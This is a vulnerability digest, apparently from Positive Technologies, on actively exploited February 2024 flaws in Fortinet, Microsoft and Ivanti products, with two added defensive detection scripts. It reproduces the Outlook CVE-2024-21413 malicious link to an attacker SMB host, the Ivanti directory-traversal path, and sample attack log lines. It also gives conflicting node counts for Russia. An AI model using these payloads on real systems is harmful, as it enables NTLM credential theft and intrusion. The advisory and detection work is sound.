The eight most dangerous vulnerabilities of February 2024

Hello friends! I'm Alexander Leonov, and together with the Positive Technologies analyst department, we have prepared for you a digest of trending vulnerabilities over the past month.

You will probably immediately ask: what are these trending vulnerabilities? These are dangerous vulnerabilities that are actively used in attacks or are highly likely to be used in the near future.

At the same time, trending vulnerabilities are not the same as critical ones. The latter can potentially take down a widely used service on the organization's perimeter, but at the same time they are difficult to exploit. It turns out that a vulnerability exists and is rated critical, yet real exploitation may take months or years, or may never come at all. Trending vulnerabilities, on the other hand, pose a danger here and now, so they need to be fixed first and as soon as possible.

Identifying trending vulnerabilities is a complex process that requires ongoing analysis of multiple data sources. I wrote about why it is not enough to simply analyze the CISA KEV catalog and the NVD database in the review of trending vulnerabilities of 2023.

Now let's see what vulnerabilities were trending in the past February.

Vulnerability in Fortinet FortiOS and FortiProxy

1. Remote code execution vulnerability in Fortinet FortiOS and FortiProxy (CVE-2024-21762, CVSS – 9.8)

Exploitation of the vulnerability allows an unauthenticated attacker to execute arbitrary code via specially crafted HTTP requests. According to the vendor, this arbitrary code execution vulnerability in Fortinet FortiOS and FortiProxy (CVE-2024-21762) is being used in attacks. Fortinet previously reported that attackers used a similar FortiOS vulnerability to deploy the Coathanger remote access Trojan.

Fortinet's advisory does not provide any details about how the vulnerability is exploited or who discovered it.

Number of potential victims: according to Shadowserver data, the number of devices running FortiOS SSL VPN is more than 465,000. In Russia, this software was detected on 2816 nodes, also according to Shadowserver.

Publicly available exploits: not publicly available.

⚔️ Remedies and compensatory measures: To eliminate the vulnerability, you need to update the software by following the recommendations given by Fortinet. If you are unable to install updates immediately, you can temporarily disable SSL VPN on FortiOS devices to reduce risk. In Russia, this software was detected on 2638 nodes, according to Shadowserver.

Vulnerabilities in Microsoft products

1. Windows SmartScreen security feature bypass vulnerability (CVE-2024-21351, CVSS – 7.6)

Exploiting this vulnerability allows an attacker to bypass Windows Defender SmartScreen checks. The vulnerability can be used to deliver malware to the system. Its use requires user interaction: the attacker needs to send the target a specially crafted malicious file and convince them to open it, which is typical of phishing.

2. Web Page Shortcuts Security Bypass Vulnerability (CVE-2024-21412, CVSS – 8.1)

This vulnerability allows malware to be delivered to the target system. To exploit it, an attacker needs to send the user a link to a resource under the attacker's control that hosts a specially crafted file with a double extension (*.jpeg.url). This file in turn points to another shortcut file containing logic to exploit the previously patched Microsoft Defender SmartScreen bypass vulnerability (CVE-2023-36025).

The phishing page itself is an <a> tag on the attacker's HTML page, named after an image (*.jpg). The victim only needs to click on it, confirm opening in Explorer, and open the file itself.

The danger is that Microsoft Defender does not warn the user that the file is being opened from an untrusted resource (the Mark of the Web, MoTW, mechanism does not work). The user may also be misled by the fact that Explorer opens in a folder called Downloads, although the file is actually located on a remote resource.

3. Microsoft Outlook remote code execution vulnerability (CVE-2024-21413, CVSS – 9.8)

The exploit bypasses Protected View in Microsoft Outlook, allowing a remote attacker to cause the victim to open a malicious document in edit mode, which could lead to remote code execution on the system.

The essence of the attack is that the user receives an email in Outlook containing a link (an <a> tag in HTML) that uses the file protocol to bypass Outlook's security measures, allowing a link like this to be delivered to the victim: <a href="file:///\\X.X.X.X\test\test.rtf!something">Link name</a>, where X.X.X.X is an address on the local network (belonging to the attacker).

In this case, the file test.rtf!something is accessed via the SMB protocol, which means the user's NTLM information will be disclosed. The !something suffix allows bypassing Microsoft Outlook's security warnings.
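A mail-gateway style check for the link pattern described above, written for this digest as an added example (not Microsoft's or the article's own code). It extracts every href from an HTML body, flags file: links that point at a UNC share (the outbound SMB / NTLM exposure), and separately flags a "!" suffix after the file name. The sample mail body and the 10.0.0.5 address are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample mail body (not a real message): a UNC file: link with the
# "!" suffix described above, an ordinary HTTPS link, and a UNC link without it.
SAMPLE_EMAIL_HTML = r"""
<a href="file:///\\10.0.0.5\test\test.rtf!something">Link name</a>
<a href="https://example.com/report">Normal link</a>
<a href="file:///\\10.0.0.5\share\doc.rtf">UNC link without suffix</a>
"""

# file: URL pointing at a UNC share: optional 2-3 slashes after the scheme, then
# "\\host\path" or "//host/path". Local paths such as file:///C:/x do not match.
UNC_FILE_LINK = re.compile(
    r"^file:(?:/{2,3})?[\\/]{2}(?P<host>[^\\/]+)(?P<path>[\\/].*)$", re.IGNORECASE)

class _HrefCollector(HTMLParser):
    """Collect the href attribute of every <a> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())

def classify_href(href):
    """Return the reasons a hyperlink is suspicious; empty list if it looks benign."""
    reasons = []
    m = UNC_FILE_LINK.match(href)
    if not m:
        return reasons
    # Any file: link to a remote share makes the client reach out over SMB,
    # which is where the NTLM disclosure described above comes from.
    reasons.append("file: link to UNC share %s (outbound SMB / NTLM exposure)" % m.group("host"))
    filename = re.split(r"[\\/]", m.group("path"))[-1]
    if "!" in filename:
        reasons.append("'!' suffix after the file name (CVE-2024-21413 Protected View bypass pattern)")
    return reasons

def scan_html(html):
    """Map each suspicious href in the mail body to its list of reasons."""
    collector = _HrefCollector()
    collector.feed(html)
    findings = {}
    for href in collector.hrefs:
        reasons = classify_href(href)
        if reasons:
            findings[href] = reasons
    return findings
```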

4. Microsoft Exchange server vulnerability leading to unauthorized elevation of privileges (CVE-2024-21410, CVSS – 9.8)

This is an elevation of privilege vulnerability in Microsoft Exchange Server. Its exploitation allows an attacker to conduct an NTLM relay attack (a type of attack in which the attacker intercepts NTLM authentication data and redirects it to another server or service in order to gain unauthorized access) and successfully authenticate to the Exchange server.

Cases of exploitation of the Microsoft vulnerabilities: according to Microsoft, exploitation of all of these vulnerabilities has been recorded. In addition, Trend Micro recorded exploitation of CVE-2024-21412 by the Water Hydra APT group, whose phishing campaigns targeted financial market traders.

Number of potential victims of all Microsoft vulnerabilities: no information.

Publicly available exploits: a public exploit is available for CVE-2024-21413; for the other Microsoft vulnerabilities, none.

⚔️ Remedies, compensatory measures: To fix the vulnerabilities, security updates are required; they can be downloaded from the official Microsoft website.

Vulnerabilities in Ivanti products

1. Authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure (CVE-2023-46805, CVSS – 8.2)

This is a zero-day vulnerability in Ivanti Connect Secure (ICS), formerly known as Pulse Connect Secure Gateway, and in Ivanti Policy Secure. It is present in versions 9.x and 22.x and arises because the server does not fully check access to files under one of the paths (/api/v1/totp/user-backup-code). As a result, an unauthenticated attacker can traverse the server's directories (api/v1/totp/user-backup-code/../../ to move to parent directories) and interact with endpoints there.
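A log-review check for the traversal described above, added here as an example (it is not Ivanti's code or part of the original article). It decodes each requested path, and reports requests that start with the unauthenticated /api/v1/totp/user-backup-code prefix but resolve outside it after ".." segments are collapsed. The access-log lines are constructed in common log format, and the endpoint names after the traversal are placeholders.

```python
import posixpath
import re
from urllib.parse import unquote

# The path the article says is reachable without authentication.
UNAUTH_PREFIX = "/api/v1/totp/user-backup-code"

# Constructed access-log lines in common log format (not real Ivanti logs);
# "example-endpoint" and "other-endpoint" are placeholders.
SAMPLE_LOG = """\
10.1.1.7 - - [15/Jan/2024:10:00:01 +0000] "GET /api/v1/totp/user-backup-code/../../example-endpoint HTTP/1.1" 200 512
10.1.1.8 - - [15/Jan/2024:10:00:05 +0000] "GET /api/v1/totp/user-backup-code HTTP/1.1" 401 0
10.1.1.9 - - [15/Jan/2024:10:00:09 +0000] "GET /api/v1/totp/user-backup-code/%2e%2e/%2e%2e/other-endpoint?x=1 HTTP/1.1" 200 77
10.1.1.10 - - [15/Jan/2024:10:00:12 +0000] "GET /login/example HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def decoded_path(target):
    """Strip the query string and percent-decode twice to catch double encoding."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path

def check_request(target):
    """Return the resolved path if a request under UNAUTH_PREFIX escapes it, else None."""
    path = decoded_path(target)
    if not path.startswith(UNAUTH_PREFIX):
        return None
    if ".." not in path.split("/"):
        return None
    resolved = posixpath.normpath(path)
    # A ".." that stays inside the prefix is odd but not an escape; an escape means
    # the prefix-based access check no longer covers the endpoint really reached.
    if resolved.startswith(UNAUTH_PREFIX):
        return None
    return resolved

def scan_log(text):
    """Return (client, raw target, resolved path) for every escaping request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        resolved = check_request(m.group("target"))
        if resolved is not None:
            hits.append((line.split()[0], m.group("target"), resolved))
    return hits
```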

“When CVE-2023-46805 is used in conjunction with CVE-2024-21887, exploitation does not require authentication and allows an attacker to create malicious requests and execute arbitrary commands on the system (Remote Code Execution),” Ivanti wrote.

2. Command injection vulnerability in Ivanti Connect Secure and Ivanti Policy Secure (CVE-2024-21887, CVSS – 9.1)

This is another zero-day vulnerability in Ivanti Connect Secure software versions 9.x and 22.x. It allows an attacker authenticated as an administrator to execute arbitrary commands on the device. Exploitation consists of supplying a malicious argument to an endpoint which, when processed by the application, ends up in a function that creates a new process or runs a command (for example, Python's popen()). This vulnerability can be exploited over the Internet.

Used in conjunction with CVE-2023-46805, it yields remote code execution on the node without authentication.

3. Server-side request forgery vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA products (CVE-2024-21893, CVSS – 8.2)

Server-side request forgery (SSRF) is present in the Security Assertion Markup Language (SAML) component of Ivanti Connect Secure (ICS). It arises from a lack of authentication, the use of an outdated version of XMLTooling that is susceptible to SSRF when processing XML data on the server side, and the ability to send malicious XML data to the endpoint.

Cases of exploitation of vulnerabilities in Ivanti products: on January 15, Volexity reported that it had found evidence of the compromise of more than 1,700 devices belonging to companies of various sizes and from various industries (for example, organizations from the financial sector, government bodies and military institutions).

Number of potential victims of vulnerabilities in Ivanti products: according to Shadowserver, there are more than 19,500 Ivanti Connect Secure devices on the network.

Publicly available exploits: publicly available.

⚔️ Remedies and compensatory measures: On February 8, Ivanti announced that it had released security updates addressing these vulnerabilities in Ivanti Connect Secure (versions 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3 and 22.6R2.2), Ivanti Policy Secure (versions 9.1R17.3, 9.1R18.4 and 22.5R1.2) and ZTA gateways (versions 22.5R1.6, 22.6R1.5 and 22.6R1.7). Where security updates are not installed, you can use the mitigation XML file available to Ivanti customers; it reduces the impact of possible exploitation. CISA has released an article with options for mitigating and eliminating the vulnerabilities.

How to protect yourself

Using popular products that contain trending vulnerabilities can put any company at risk. Such vulnerabilities are the most dangerous and require immediate remediation. Information about trending vulnerabilities reaches the MaxPatrol VM vulnerability management system within 12 hours, which allows you to take timely measures to eliminate the most dangerous of them and protect the infrastructure.


Alexander Leonov

Leading expert of the PT Expert Security Center laboratory
